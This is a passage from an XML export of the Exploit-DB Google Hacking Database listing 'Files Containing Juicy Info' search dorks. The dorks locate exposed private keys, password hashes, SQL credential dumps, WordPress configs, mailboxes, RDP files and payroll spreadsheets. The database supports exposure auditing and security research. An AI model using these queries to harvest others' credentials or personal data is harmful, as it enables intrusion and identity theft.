<query>filetype:pdf &quot;acunetix website audit&quot; &quot;alerts summary&quot;</query>
<querystring>https://www.google.com/search?q=filetype:pdf &quot;acunetix website audit&quot; &quot;alerts summary&quot;</querystring>
<edb></edb>
<date>2014-03-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4269</id>
<link>https://www.exploit-db.com/ghdb/4269</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pdf intitle:&quot;SSL Report&quot;</shortDescription>
<textualDescription>These dork show Qualys SSL Reports Hosts.
Enjoy with them.
Regards.
Rootkit Pentester.</textualDescription>
<query>filetype:pdf intitle:&quot;SSL Report&quot;</query>
<querystring>https://www.google.com/search?q=filetype:pdf intitle:&quot;SSL Report&quot;</querystring>
<edb></edb>
<date>2016-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3736</id>
<link>https://www.exploit-db.com/ghdb/3736</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pem &quot;Microsoft&quot;</shortDescription>
<textualDescription>Microsoft private keys, frequently used for servers with UserID on the same
page.
--
Shamanoid</textualDescription>
<query>filetype:pem &quot;Microsoft&quot;</query>
<querystring>https://www.google.com/search?q=filetype:pem &quot;Microsoft&quot;</querystring>
<edb></edb>
<date>2011-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3845</id>
<link>https://www.exploit-db.com/ghdb/3845</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:php -site:php.net intitle:phpinfo &quot;published by the PHP Group&quot;</shortDescription>
<textualDescription>Tries to reduce false positive results from similar dorks. Finds pages
containing output from phpinfo(). This function is used to debug and test
PHP installations by listing versions, extensions, configurations, server
information, file system information, and execution environment. The output
of this function should not be included in production environments and
certain versions of this function are vulnerable to reflected XSS attacks.
- Andy G - twitter.com/vxhex</textualDescription>
<query>filetype:php -site:php.net intitle:phpinfo &quot;published by the PHP Group&quot;</query>
<querystring>https://www.google.com/search?q=filetype:php -site:php.net intitle:phpinfo &quot;published by the PHP Group&quot;</querystring>
<edb></edb>
<date>2013-04-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>3903</id>
<link>https://www.exploit-db.com/ghdb/3903</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:php intext:&quot;PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT&quot;</shortDescription>
<textualDescription>Project Honey Pot anti-spammer detection (http://www.projecthoneypot.org/)
Can identify the honeypot and get the site's honeypot keys
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>filetype:php intext:&quot;PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT&quot;</query>
<querystring>https://www.google.com/search?q=filetype:php intext:&quot;PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>637</id>
<link>https://www.exploit-db.com/ghdb/637</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net</shortDescription>
<textualDescription>PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigationThis reveals the RSS info for the user calendars.</textualDescription>
<query>filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net</query>
<querystring>https://www.google.com/search?num=100&amp;&amp;q=filetype%3Aphp+inurl%3Aindex+inurl%3Aphpicalendar+-site%3Asourceforge.net</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>469</id>
<link>https://www.exploit-db.com/ghdb/469</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pot inurl:john.pot</shortDescription>
<textualDescription>John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)PS: This was posted to the &quot;fun&quot; forum, so don't take this too seriously !</textualDescription>
<query>filetype:pot inurl:john.pot</query>
<querystring>https://www.google.com/search?q=filetype%3Apot+inurl%3Ajohn.pot+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1031</id>
<link>https://www.exploit-db.com/ghdb/1031</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:PS ps</shortDescription>
<textualDescription>PS is for &quot;postscript&quot;...which basically means you get the high quality press data for documents. Just run 'adobe distiller' or alike to produce a readable PDF. Found items include complete books as sold on amazon, annual reports and even juicier stuff.</textualDescription>
<query>filetype:PS ps</query>
<querystring>https://www.google.com/search?q=filetype%3APS+ps</querystring>
<edb></edb>
<date>2005-07-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>497</id>
<link>https://www.exploit-db.com/ghdb/497</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pst inurl:&quot;outlook.pst&quot;</shortDescription>
<textualDescription>All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure.</textualDescription>
<query>filetype:pst inurl:&quot;outlook.pst&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Apst+inurl%3A%22outlook.pst%22</querystring>
<edb></edb>
<date>2004-09-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>666</id>
<link>https://www.exploit-db.com/ghdb/666</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pst pst -from -to -date</shortDescription>
<textualDescription>Finds Outlook PST files which can contain emails, calendaring and address information.</textualDescription>
<query>filetype:pst pst -from -to -date</query>
<querystring>https://www.google.com/search?q=filetype%3Apst+pst+-from+-to+-date</querystring>
<edb></edb>
<date>2004-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5061</id>
<link>https://www.exploit-db.com/ghdb/5061</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pub &quot;ssh-rsa&quot;</shortDescription>
<textualDescription>Find SSH Public Keys
filetype:pub &quot;ssh-rsa&quot;
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:pub &quot;ssh-rsa&quot;</query>
<querystring>https://www.google.com/search?q=filetype:pub &quot;ssh-rsa&quot;</querystring>
<edb></edb>
<date>2019-01-02</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>4006</id>
<link>https://www.exploit-db.com/ghdb/4006</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pub inurl:ssh</shortDescription>
<textualDescription>This dork finds various SSH pub files.
Author:NickiK.</textualDescription>
<query>filetype:pub inurl:ssh</query>
<querystring>https://www.google.com/search?q=filetype:pub inurl:ssh</querystring>
<edb></edb>
<date>2015-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>456</id>
<link>https://www.exploit-db.com/ghdb/456</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:qbb qbb</shortDescription>
<textualDescription>This search will show QuickBooks Bakup Files. Quickbook is financial accounting software so storing these files in a webtree is not a smart idea.</textualDescription>
<query>filetype:qbb qbb</query>
<querystring>https://www.google.com/search?q=filetype%3Aqbb+qbb</querystring>
<edb></edb>
<date>2004-09-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1022</id>
<link>https://www.exploit-db.com/ghdb/1022</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:QBW qbw</shortDescription>
<textualDescription>Quickbooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. Its a nice software package but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection. SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available. This could lead to identity theft, or worse...</textualDescription>
<query>filetype:QBW qbw</query>
<querystring>https://www.google.com/search?c2coff=1&amp;biw=1400&amp;q=filetype%3AQBW+qbw</querystring>
<edb></edb>
<date>2005-06-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4266</id>
<link>https://www.exploit-db.com/ghdb/4266</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:rcf inurl:vpn</shortDescription>
<textualDescription>Sonicwall Global VPN Client files containing sensitive information and login</textualDescription>
<query>filetype:rcf inurl:vpn</query>
<querystring>https://www.google.com/search?q=filetype:rcf inurl:vpn</querystring>
<edb></edb>
<date>2016-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5023</id>
<link>https://www.exploit-db.com/ghdb/5023</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:rdp default.rdp</shortDescription>
<textualDescription>Find Remote Desktop Protocol Connection Information
filetype:rdp default.rdp
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:rdp default.rdp</query>
<querystring>https://www.google.com/search?q=filetype:rdp default.rdp</querystring>
<edb></edb>
<date>2018-11-14</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>464</id>
<link>https://www.exploit-db.com/ghdb/464</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:rdp rdp</shortDescription>
<textualDescription>These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols.</textualDescription>
<query>filetype:rdp rdp</query>
<querystring>https://www.google.com/search?q=filetype%3Ardp+rdp</querystring>
<edb></edb>
<date>2004-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>465</id>
<link>https://www.exploit-db.com/ghdb/465</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:reg &quot;Terminal Server Client&quot;</shortDescription>
<textualDescription>These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses.</textualDescription>
<query>filetype:reg &quot;Terminal Server Client&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Areg+%22Terminal+Server+Client%22</querystring>
<edb></edb>
<date>2004-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5864</id>
<link>https://www.exploit-db.com/ghdb/5864</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:reg reg HKEY_CLASSES_ROOT -git</shortDescription>
<textualDescription># Google Dork: filetype:reg reg HKEY_CLASSES_ROOT -git
# By using this dork, the HKEY_CLASSES_ROOT (HKCR) key that contains file
name extension associations and COM class registration information such as
ProgIDs, CLSIDs, and IIDs. can be found.
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>filetype:reg reg HKEY_CLASSES_ROOT -git</query>
<querystring>https://www.google.com/search?q=filetype:reg reg HKEY_CLASSES_ROOT -git</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1426</id>
<link>https://www.exploit-db.com/ghdb/1426</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS</shortDescription>
<textualDescription>This search locates private SSHHostkeys.
Author: loganWHD</textualDescription>
<query>filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS</query>
<querystring>https://www.google.com/search?q=filetype%3Areg+reg+HKEY_CURRENT_USER+SSHHOSTKEYS&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3751</id>
<link>https://www.exploit-db.com/ghdb/3751</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS</shortDescription>
<textualDescription>this dork locates registry dumps
</textualDescription>
<query>filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS</query>
<querystring>https://www.google.com/search?q=filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS</querystring>
<edb></edb>
<date>2011-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5865</id>
<link>https://www.exploit-db.com/ghdb/5865</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:reg reg HKEY_USERS -git</shortDescription>
<textualDescription># Google Dork: filetype:reg reg HKEY_USERS -git
# By using this dork, the HKEY_USERS contains user-specific configuration
information for all currently active users on a computer can be found.
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>filetype:reg reg HKEY_USERS -git</query>
<querystring>https://www.google.com/search?q=filetype:reg reg HKEY_USERS -git</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5863</id>
<link>https://www.exploit-db.com/ghdb/5863</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:reg reg [HKEY_CURRENT_USER\Software\] -git</shortDescription>
<textualDescription># Google Dork: filetype:reg reg [HKEY_CURRENT_USER\Software\] -git
# By using this dork, some passwords for WinVNC and FAR plugins for Mail,
FTP and ProxyFTP can be found.
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>filetype:reg reg [HKEY_CURRENT_USERSoftware] -git</query>
<querystring>https://www.google.com/search?q=filetype:reg reg [HKEY_CURRENT_USER\Software\] -git</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8027</id>
<link>https://www.exploit-db.com/ghdb/8027</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:reg [HKEY_USERS\DEFAULT]</shortDescription>
<textualDescription># Google Dork: filetype:reg [HKEY_USERS\DEFAULT]n
# Files Containing Juicy Info
# Date:17/08/2022
# Exploit Author: Leonardo Venegas</textualDescription>
<query>filetype:reg [HKEY_USERSDEFAULT]</query>
<querystring>https://www.google.com/search?q=filetype:reg [HKEY_USERS\DEFAULT]</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Leonardo Venegas</author>
</entry>
<entry>
<id>6218</id>
<link>https://www.exploit-db.com/ghdb/6218</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:sql intext: &quot;sql dump&quot;</shortDescription>
<textualDescription>filetype:sql intext: &quot;sql dump&quot;
Sensitive Sql dump files in various domains
</textualDescription>
<query>filetype:sql intext: &quot;sql dump&quot;</query>
<querystring>https://www.google.com/search?q=filetype:sql intext: &quot;sql dump&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>andre vinicius</author>
</entry>
<entry>
<id>4699</id>
<link>https://www.exploit-db.com/ghdb/4699</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES</shortDescription>
<textualDescription>Google Dork : filetype:sql intext:password | pass | passwd intext:username
intext:INSERT INTO `users` VALUES
Author: screetsec
Description: This dork allow you to specific find file contains Username,
Password, Secret Keys and allows you to search for sql configuration file
</textualDescription>
<query>filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES</query>
<querystring>https://www.google.com/search?q=filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES</querystring>
<edb></edb>
<date>2018-03-16</date>
<author>screetsec</author>
</entry>
<entry>
<id>4308</id>
<link>https://www.exploit-db.com/ghdb/4308</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:sql intext:wp_users phpmyadmin</shortDescription>
<textualDescription># Exploit Title: (Google Dork) filetype:sql intext:wp_users phpmyadmin
# Google Dork: filetype:sql intext:wp_users phpmyadmin
# Date: 2016-07-06
# Exploit Author: RuBiQc
Description: Finds SQL dump files of Wordpress sites with usernames and
passwords. Pretty funny that people make these publicly available!</textualDescription>
<query>filetype:sql intext:wp_users phpmyadmin</query>
<querystring>https://www.google.com/search?q=filetype:sql intext:wp_users phpmyadmin</querystring>
<edb></edb>
<date>2016-07-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3955</id>
<link>https://www.exploit-db.com/ghdb/3955</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:sql site:gov and &quot;insert into&quot;</shortDescription>
<textualDescription>filetype:sql site:gov and &quot;insert into&quot;
find sql files with data on governments sites </textualDescription>
<query>filetype:sql site:gov and &quot;insert into&quot;</query>
<querystring>https://www.google.com/search?q=filetype:sql site:gov and &quot;insert into&quot;</querystring>
<edb></edb>
<date>2014-07-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4587</id>
<link>https://www.exploit-db.com/ghdb/4587</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:tpl intext:mysql_connect</shortDescription>
<textualDescription>mysql_connect in php template files (db username and db password):
filetype:tpl intext:mysql_connect
-al4r0</textualDescription>
<query>filetype:tpl intext:mysql_connect</query>
<querystring>https://www.google.com/search?q=filetype:tpl intext:mysql_connect</querystring>
<edb></edb>
<date>2017-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4286</id>
<link>https://www.exploit-db.com/ghdb/4286</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt &quot;gmail&quot; | &quot;hotmail&quot; | &quot;yahoo&quot; -robots site:gov | site:us</shortDescription>
<textualDescription>filetype:txt &quot;gmail&quot; | &quot;hotmail&quot; | &quot;yahoo&quot; -robots site:gov | site:us
Emails</textualDescription>
<query>filetype:txt &quot;gmail&quot; | &quot;hotmail&quot; | &quot;yahoo&quot; -robots site:gov | site:us</query>
<querystring>https://www.google.com/search?q=filetype:txt &quot;gmail&quot; | &quot;hotmail&quot; | &quot;yahoo&quot; -robots site:gov | site:us</querystring>
<edb></edb>
<date>2016-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5024</id>
<link>https://www.exploit-db.com/ghdb/5024</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt &quot;License Key&quot;</shortDescription>
<textualDescription>Find License Keys for Various Software Products
filetype:txt &quot;License Key&quot;
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:txt &quot;License Key&quot;</query>
<querystring>https://www.google.com/search?q=filetype:txt &quot;License Key&quot;</querystring>
<edb></edb>
<date>2018-11-14</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>5058</id>
<link>https://www.exploit-db.com/ghdb/5058</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt &quot;Registration Code&quot;</shortDescription>
<textualDescription>My first dork
Thanks!
T3jv1l
</textualDescription>
<query>filetype:txt &quot;Registration Code&quot;</query>
<querystring>https://www.google.com/search?q=filetype:txt &quot;Registration Code&quot;</querystring>
<edb></edb>
<date>2018-12-14</date>
<author>T3jv1l</author>
</entry>
<entry>
<id>4887</id>
<link>https://www.exploit-db.com/ghdb/4887</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt Administrator:500:</shortDescription>
<textualDescription>Find Windows SAM database hashes
filetype:txt Administrator:500:
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:txt Administrator:500:</query>
<querystring>https://www.google.com/search?q=filetype:txt Administrator:500:</querystring>
<edb></edb>
<date>2018-07-06</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>8352</id>
<link>https://www.exploit-db.com/ghdb/8352</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt CLAVE*.txt OR clave*.txt</shortDescription>
<textualDescription># Google Dork: filetype:txt CLAVE*.txt OR clave*.txt
# Files Containing Juicy Info
# Date: 23/11/2023
# Exploit: Kevin Tupiza</textualDescription>
<query>filetype:txt CLAVE*.txt OR clave*.txt</query>
<querystring>https://www.google.com/search?q=filetype:txt CLAVE*.txt OR clave*.txt</querystring>
<edb></edb>
<date>2023-11-23</date>
<author>Kevin Tupiza</author>
</entry>
<entry>
<id>3883</id>
<link>https://www.exploit-db.com/ghdb/3883</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt inurl:wp-config.txt</shortDescription>
<textualDescription>Easily hunt the Wordpress configuration file in of remote web sites
Author : Un0wn_X</textualDescription>
<query>filetype:txt inurl:wp-config.txt</query>
<querystring>https://www.google.com/search?q=filetype:txt inurl:wp-config.txt</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3884</id>
<link>https://www.exploit-db.com/ghdb/3884</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt inurl:~~Wordpress2.txt</shortDescription>
<textualDescription>This dork can be used to find symlinked Wordpress configuration files of
other web sites</textualDescription>
<query>filetype:txt inurl:~~Wordpress2.txt</query>
<querystring>https://www.google.com/search?q=filetype:txt inurl:~~Wordpress2.txt</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4985</id>
<link>https://www.exploit-db.com/ghdb/4985</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt line vty 0 4</shortDescription>
<textualDescription>filetype:txt line vty 0 4
Discover Cisco Running Configuration
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:txt line vty 0 4</query>
<querystring>https://www.google.com/search?q=filetype:txt line vty 0 4</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>7654</id>
<link>https://www.exploit-db.com/ghdb/7654</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:txt site:gitlab.* &quot;secret&quot; OR &quot;authtoken&quot;</shortDescription>
<textualDescription># Google Dork: filetype:txt site:gitlab.* &quot;secret&quot; OR &quot;authtoken&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Jorge Manuel Lozano Gómez</textualDescription>
<query>filetype:txt site:gitlab.* &quot;secret&quot; OR &quot;authtoken&quot;</query>
<querystring>https://www.google.com/search?q=filetype:txt site:gitlab.* &quot;secret&quot; OR &quot;authtoken&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Jorge Manuel Lozano Gómez</author>
</entry>
<entry>
<id>494</id>
<link>https://www.exploit-db.com/ghdb/494</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:vcs vcs</shortDescription>
<textualDescription>Filext.com says: &quot;Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written.&quot;The most common use is the &quot;vCalendar File&quot;, used by Outlook for example. It can also belong to a &quot;Palm vCal Desktop Application&quot;. For those who prefer clean searches, try these variations (with less results):&quot;PRODID: PalmDesktop Generated&quot;filetype:vcs VCALENDAR filetype:vcs BEGIN:VCALENDAR</textualDescription>
<query>filetype:vcs vcs</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Avcs+vcs</querystring>
<edb></edb>
<date>2004-09-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>213</id>
<link>https://www.exploit-db.com/ghdb/213</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:wab wab</shortDescription>
<textualDescription>These are Microsoft Outlook Mail address books. The information contained will vary, but at the least an attacker can glean email addresses and contact information.</textualDescription>
<query>filetype:wab wab</query>
<querystring>https://www.google.com/search?q=filetype%3Awab+wab+</querystring>
<edb></edb>
<date>2004-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5293</id>
<link>https://www.exploit-db.com/ghdb/5293</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xls &quot;nomina&quot;</shortDescription>
<textualDescription>[*] Dork: filetype:xls &quot;nomina&quot;
[*] Este dork, nos permite buscar archivos con información sensible de empresas, como por ejemplo nominas o datos de sus empleados.
[*] This dork allows us to search for files with sensitive company information, such as payroll or employee data.
Drok3r</textualDescription>
<query>filetype:xls &quot;nomina&quot;</query>
<querystring>https://www.google.com/search?q=filetype:xls &quot;nomina&quot;</querystring>
<edb></edb>
<date>2019-07-29</date>
<author>Drok3r</author>
</entry>
<entry>
<id>3717</id>
<link>https://www.exploit-db.com/ghdb/3717</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xls + password + inurl:.com</shortDescription>
<textualDescription>The filetype:xls never changes
What is inbtween then + sings can be what ever you are looking for
taxid
ssn
password
Student ID
etc
The inurl: can be changed to what you want
.gov
.edu
.com
etc.
Take care,
RedShift</textualDescription>
<query>filetype:xls + password + inurl:.com</query>
<querystring>https://www.google.com/search?q=filetype:xls + password + inurl:.com</querystring>
<edb></edb>
<date>2011-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>424</id>
<link>https://www.exploit-db.com/ghdb/424</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xls -site:gov inurl:contact</shortDescription>
<textualDescription>Microsoft Excel sheets containing contact information.</textualDescription>
<query>filetype:xls -site:gov inurl:contact</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Axls+-site%3Agov+inurl%3Acontact</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>471</id>
<link>https://www.exploit-db.com/ghdb/471</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xls inurl:&quot;email.xls&quot;</shortDescription>
<textualDescription>Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses.</textualDescription>
<query>filetype:xls inurl:&quot;email.xls&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Axls+inurl%3A%22email.xls%22+</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4880</id>
<link>https://www.exploit-db.com/ghdb/4880</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xls | xlsx intext:cisco -cisco.com site:.gov</shortDescription>
<textualDescription>Very nice network infrastructure info
Also try:
filetype:xls | xlsx intext:fortigate -fortinet.com site:.gov
filetype:xls | xlsx intext:bluecoat -bluecoat.com site:.gov
filetype:xls | xlsx intext:checkpoint -checkpoint.com site:.gov
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>filetype:xls | xlsx intext:cisco -cisco.com site:.gov</query>
<querystring>https://www.google.com/search?q=filetype:xls | xlsx intext:cisco -cisco.com site:.gov</querystring>
<edb></edb>
<date>2018-07-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4879</id>
<link>https://www.exploit-db.com/ghdb/4879</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xls | xlsx intext:software license site:.gov</shortDescription>
<textualDescription>Dork for juicy info.
Also try:
filetype:doc | pdf intext:software license site:.gov
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>filetype:xls | xlsx intext:software license site:.gov</query>
<querystring>https://www.google.com/search?q=filetype:xls | xlsx intext:software license site:.gov</querystring>
<edb></edb>
<date>2018-07-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7175</id>
<link>https://www.exploit-db.com/ghdb/7175</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xlsx intext:&quot;gmail.com&quot; OR &quot;hotmail.com&quot; site:gov</shortDescription>
<textualDescription># Google Dork: filetype:xlsx intext:&quot;gmail.com&quot; OR &quot;hotmail.com&quot; site:gov
# Files Containing Juicy Info
# Date: 04/09/2021
# Exploit Author: Ujas Dhami</textualDescription>
<query>filetype:xlsx intext:&quot;gmail.com&quot; OR &quot;hotmail.com&quot; site:gov</query>
<querystring>https://www.google.com/search?q=filetype:xlsx intext:&quot;gmail.com&quot; OR &quot;hotmail.com&quot; site:gov</querystring>
<edb></edb>
<date>2021-09-09</date>
<author>Ujas Dhami</author>
</entry>
<entry>
<id>3987</id>
<link>https://www.exploit-db.com/ghdb/3987</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www</shortDescription>
<textualDescription>Hi,
This google dork to find sensitive and interesting information under
WEB-INF directory via ftp protocol, for example:
* Website map
* Sensitive information (user name and password for webdave)
* Deployment descriptor in java (web.xml)
* Servlet mapping url pattern
Keyword:
filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www
--
Fahad Altamimi</textualDescription>
<query>filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www</query>
<querystring>https://www.google.com/search?q=filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www</querystring>
<edb></edb>
<date>2015-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3919</id>
<link>https://www.exploit-db.com/ghdb/3919</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:xml inurl:sitemap</shortDescription>
<textualDescription>Sitemaps, the opposite of Web Robots Exclusion
Detail directory and page map
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>filetype:xml inurl:sitemap</query>
<querystring>https://www.google.com/search?q=filetype:xml inurl:sitemap</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6</id>
<link>https://www.exploit-db.com/ghdb/6</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Financial spreadsheets: finance.xls</shortDescription>
<textualDescription>Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!</textualDescription>
<query>intitle:&quot;Index of&quot; finance.xls</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+finance.xls</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7</id>
<link>https://www.exploit-db.com/ghdb/7</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Financial spreadsheets: finances.xls</shortDescription>
<textualDescription>Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!</textualDescription>
<query>intitle:index.of finances.xls</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+finances.xls</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>8269</id>
<link>https://www.exploit-db.com/ghdb/8269</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Fwd: Google Dork: inurl:login/login-user</shortDescription>
<textualDescription># Google Dork: inurl:login/login-user
# Files Containing Juicy Info
# Date:01/08/2023
# Exploit Author: Faridul Hasan
</textualDescription>
